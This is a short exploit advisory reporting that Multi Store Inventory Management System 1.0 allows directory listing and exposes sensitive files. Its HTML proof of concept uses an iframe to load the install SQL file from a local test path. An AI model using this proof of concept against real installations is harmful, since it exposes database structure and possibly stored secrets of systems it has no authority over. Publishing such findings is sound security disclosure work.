# Exploit Title: Multi Store Inventory Management System - Information Disclosure
# Date: 04/04/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.bdtask.com/
# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/
# Version: 1.0
# Tested on: XAMPP, Windows 10
# Contact: https://twitter.com/dmaral3noz

# Description :

The application allows directory listing and information disclosure of
some sensitive files that can allow an attacker to leverage the disclosed
information.


################################################

PoC Html :

<html>
<head><body>
<title>Multi Store Inventory Management System - Information Disclosure</title>
<iframe
src=http://127.0.0.1/multistore_demo/install/sql/install.sql>
</body></head>
<html>